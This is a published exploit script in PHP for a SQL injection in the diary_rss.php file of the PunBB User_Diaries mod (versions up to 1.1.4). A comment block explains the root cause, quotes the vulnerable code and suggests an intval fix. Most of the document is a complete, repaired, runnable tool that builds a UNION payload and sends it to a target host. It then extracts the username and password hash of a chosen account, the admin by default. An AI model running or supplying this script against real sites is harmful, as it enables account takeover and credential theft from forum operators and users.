PunBB Mod User_Diaries <= 1.1.4 (diary_rss.php) SQL Injection Exploit
Posted on 30 July 2010
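#!/usr/bin/php
<?php
/*
 ---------------------------------------------------------------------
 PunBB Mod User_Diaries <= 1.1.4 "diary_rss.php" SQL injection exploit
 ---------------------------------------------------------------------
 download: http://www.punres.org/files.php?pid=467
 by staker[at]hotmail[dot]it
 ---------------------------------------------------------------------

 [*] http://[example]/diary_rss.php?id=0+UNION+SELECT+1,CONCAT_WS(0x3a,username,password),3,4,5,6,7,8,9+FROM+foo_users+WHERE+id=2#

 Root cause (diary_rss.php, lines 69-83):

   {1} $_GET["id"] is copied verbatim into $user_id.
   {2} $user_id is concatenated, unquoted and unescaped, into $where.
   {3} $where is appended to the SELECT ... LEFT JOIN ... users AS r
       ON u.poster_id=r.id query.

   Because the value lands in a numeric context (no surrounding quotes),
   magic_quotes_gpc / addslashes give no protection: the payload needs no
   quote characters at all, which is why it works regardless of php.ini
   settings.  The outer SELECT returns 9 columns, so the UNION must supply
   9 as well.  The leading "0" just has to be an id that matches no real
   diary row, so the only row returned is the injected one.

   Vulnerable code:

     if (!empty($_GET["id"])) {
         $user_id = $_GET["id"];                       // {1}
         $where = " WHERE u.poster_id = ".$user_id;    // {2}
     } else {
         $user_id = '';
         $where = '';
     }
     $result = $db->query("
         SELECT u.id, r.username, u.poster, u.poster_id, u.poster_ip,
                u.message, u.posted, u.entry_date, u.image_ext
         FROM ".$db->prefix."diary as u
         LEFT JOIN ".$db->prefix."users AS r ON u.poster_id=r.id".$where."
         ORDER BY u.posted DESC LIMIT 0,20                // {3}
     ") or error('Unable to fetch diary entries', __FILE__, __LINE__, $db->error());

   Fix for the mod: force the id to an integer before it reaches the query,
   e.g.
     $user_id = intval($_GET["id"]);
     $where   = $user_id > 0 ? " WHERE u.poster_id = " . $user_id : '';
   and never interpolate request data into SQL.

 Changes from the originally published script (it did not work as posted):
   - data_send() was called with $target, which is never assigned; the
     connection therefore always failed.  It now uses $host.
   - the <title> regex used "/" as delimiter but contained an unescaped
     "/" in "</title>", so preg_match() returned false every time.
   - the request lines had lost their CRLF terminators and the blank line
     that ends the header block.
   - table prefix and user id are optional CLI arguments instead of
     hard-coded constants (defaults unchanged).
 */

error_reporting(E_ALL);

/**
 * Build the injected value for the "id" parameter.
 *
 * "0" selects no real row, the UNION appends one row whose 2nd column
 * carries "username:password" (0x3a is ':') for user $uid, and %23 ('#')
 * comments out the trailing ORDER BY / LIMIT.
 *
 * @param string $prefix PunBB table prefix ("punbb_" on a default install)
 * @param int    $uid    user id to dump (2 is the first admin account by default)
 * @return string URL-encoded payload, ready to be appended to "?id="
 */
function build_payload($prefix, $uid)
{
    return '0+UNION+SELECT+1,CONCAT_WS(0x3a,username,password),3,4,5,6,7,8,9'
         . '+FROM+' . $prefix . 'users+WHERE+id=' . (int) $uid . '%23';
}

/**
 * Build the raw HTTP request for diary_rss.php.
 *
 * Every line is CRLF-terminated and the header block ends with an empty
 * line, otherwise the server never answers.  HTTP/1.0 is requested so the
 * body comes back unchunked, which keeps the <title> search simple.
 *
 * @param string $host    target host (goes into the Host header)
 * @param string $path    forum path, e.g. "/punbb/" or "/"
 * @param string $payload output of build_payload()
 * @return string complete request, ready for the socket
 */
function build_request($host, $path, $payload)
{
    // normalise "/punbb/", "punbb" and "/" to "/punbb" / "" so the
    // request never contains a double slash
    $path = rtrim($path, '/');
    if ($path !== '' && $path[0] !== '/') {
        $path = '/' . $path;
    }
    return "GET {$path}/diary_rss.php?id={$payload} HTTP/1.0\r\n"
         . "Host: {$host}\r\n"
         . "User-Agent: Lynx (textmode)\r\n"
         . "Connection: close\r\n\r\n";
}

/**
 * Pull the dumped "user:hash" pair out of the raw response.
 *
 * As in the original script, the first <title> element is taken and the
 * text between its first pair of single quotes is returned; that is where
 * the feed is assumed to echo r.username (not verified here against the
 * mod's feed template).  If the title holds no quotes the whole title text
 * is returned so the operator can still see what came back.
 *
 * @param string $response full HTTP response (headers + body)
 * @return string|null extracted value, or null when no <title> is present
 */
function extract_result($response)
{
    if (!preg_match('#<title>(.+?)</title>#is', $response, $m)) {
        return null;
    }
    $parts = explode("'", $m[1]);
    return isset($parts[1]) ? $parts[1] : $m[1];
}

/**
 * Send a raw request and return the complete response (headers + body).
 *
 * Exits with a message when the TCP connection cannot be opened.
 *
 * @param string $host    host to connect to
 * @param string $data    raw request bytes
 * @param int    $port    TCP port (80)
 * @param int    $timeout connect/read timeout in seconds
 * @return string everything the server sent until it closed the socket
 */
function data_send($host, $data, $port = 80, $timeout = 10)
{
    $sock = @fsockopen($host, $port, $errno, $errstr, $timeout);
    if (!$sock) {
        die("Connection refused,try again! ({$errstr})\n");
    }
    stream_set_timeout($sock, $timeout);
    fputs($sock, $data);
    $html = '';
    while (!feof($sock)) {
        $html .= fgets($sock);
    }
    fclose($sock);
    return $html;
}

/**
 * CLI entry point: php diary.php <host> <path> [table_prefix] [user_id]
 *
 * @param array $argv command-line arguments
 * @return int process exit status (0 on success, 1 when nothing was extracted)
 */
function main($argv)
{
    echo "\n---------------------------------------------------------------------\n"
       . "PunBB Mod User_Diaries <= 1.1.4 \"diary_rss.php\" sql injection exploit\n"
       . "---------------------------------------------------------------------\n"
       . "by staker[at]hotmail[dot]it\n\n";

    if (count($argv) < 3) {
        die("Usage: php diary.php <host> <path> [table_prefix] [user_id]\n"
          . "   eg: php diary.php localhost /punbb/ punbb_ 2\n");
    }
    $host   = $argv[1];
    $path   = $argv[2];
    $prefix = isset($argv[3]) ? $argv[3] : 'punbb_';   // default table_prefix
    $uid    = isset($argv[4]) ? (int) $argv[4] : 2;    // default id (admin)

    $packet = build_request($host, $path, build_payload($prefix, $uid));
    $result = extract_result(data_send($host, $packet));

    if ($result === null) {
        echo "Exploit failed\n";
        return 1;
    }
    print "Result: {$result}\n";
    return 0;
}

// run only when executed directly, so the helpers can be included and tested
if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    exit(main($argv));
}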